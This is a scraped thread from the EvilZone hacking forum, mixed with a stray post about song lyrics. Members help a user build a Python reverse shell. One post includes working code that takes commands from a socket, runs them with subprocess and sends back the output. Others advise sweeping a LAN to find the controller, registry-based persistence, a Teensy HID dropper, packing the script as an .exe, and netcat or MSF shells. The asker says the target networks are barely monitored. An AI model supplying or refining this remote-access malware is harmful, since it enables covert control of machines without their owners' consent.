EvilZone

Well i don't think it's much of a shell if you don't receive any output from the command you execute. Try something like this instead;

#recieve command
            cmd=con.recv(1024)
 
            #execute command
            proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            out,err=proc.communicate()
 
            #send output
            con.send(out+err)

subprocess.Popen returns the result of the command executed. Check out https://evilzone.org/projects-and-discussion/project-shebang/15/ for the full code.

I'd like to help too,with lyrics. Can't promise they''ll be ultra-tight but i'd like to give it whirl

Love this song though-This is Evilzone - http://www.newgrounds.com/audio/listen/513500

Hanorotu's work.It's great and i like to attempt a remix    

Well you said that you will be using it on a WLAN mostly which is not much different from something a regular LAN.
Using a fixed IP address is by far the easiest, very often sys admins tend to specify a DHCP pool from a certain starting point to an endpoint , any addresses not in that range will never be in use or are used for specific services etc.
But I understand that this isn't fancy enough

Since you are on the same LAN and we we wont have to bothered with things like NAT and other network horrors there is also no real reason to use a reverse connection , you can in this case flip the model and use the clients as servers.
Having them open a specific port and fetch the data yourself, this way they dont depend on a server on the network thus less things to go wrong.

Another idea might be to use mere force,  in the realm of computing ~250 or tenfolds are nothing.
It might be a little noisy but why not have the client attempt to connect to the entire range of addresses in the network.
Say the client is  on 192.168.100.173 and the server is on .058.
Just let the client attempt a connection to say port 32112 on the entire range from  0-254.
Within milliseconds it will hit the server and a connection is established.

Perhaps using things like broadcast or reverse DNS might be interesting protocols to investigate.
Keeping it KISS is the way to go no matter what you do

True. Those could work but if remember correctly i tried assigning my own IP address and my laptop just plain refused to connect to the WLAN(What do you think could have caused that?). The networks i plan on using have little or no network monitoring so i'm taking advantage of that to be a little lose with the anonymity and focus on core functionality. Computer security isn't something taken very seriously here(Yay for me ) I think i'll write a different script for each method, just for the sake of learning.

There are other packet capture and packet decoding/encoding for python. Here's a couple. You might have to have specific version of Python though.

http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pcapy
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
https://code.google.com/p/dpkt/

Problem is there's not a ton of documentation for these modules.

You could also craft the RARP request from scratch using raw sockets, but I think I found what you are looking for; this library can craft RARP packets:
https://pypi.python.org/pypi/arp/1.0

Cool. Thanks again frog.

You are making this very difficult on yourself, I suggest reading up a bit on TCP/IP

  Great advice. Shoulda done this before getting so specific. I am not done read this TCP/IP book i got but a quick question;

Instead of using MAC, could i just query the network's DNS server with my computer name?

Too bad you can't save your progress though.

Thanks a lot frog. That's pretty useful stuff. Originally i planned on simply copying the files to the directories and editing the registry but your way sounds interesting. Plus the .exe in .exe info looks great. I'll be sure to look into it.

Gonna have to put a hold on the Teensy though. Ordering stuff from here is murder.

But thanks again. I'll keep y'all posted.

This is what he's looking for: https://evilzone.org/projects-and-discussion/teensy-dropper-project-details-and-progress/
Autorun is dead, forget about it. HID is the future.

Python reverse shell sounds ridiculous. A regular user won't have python installed and on linux it can just be blocked. I'd go for netcat or at least a MSF generated reverse shell...

I was gonna compile the script to .exe with py2exe or pyinstaller. Plus i just wanted the feel of writing a reverse shell I've been checking out HID but i'm not sure i can get the hardware. I'll continue reading up on it though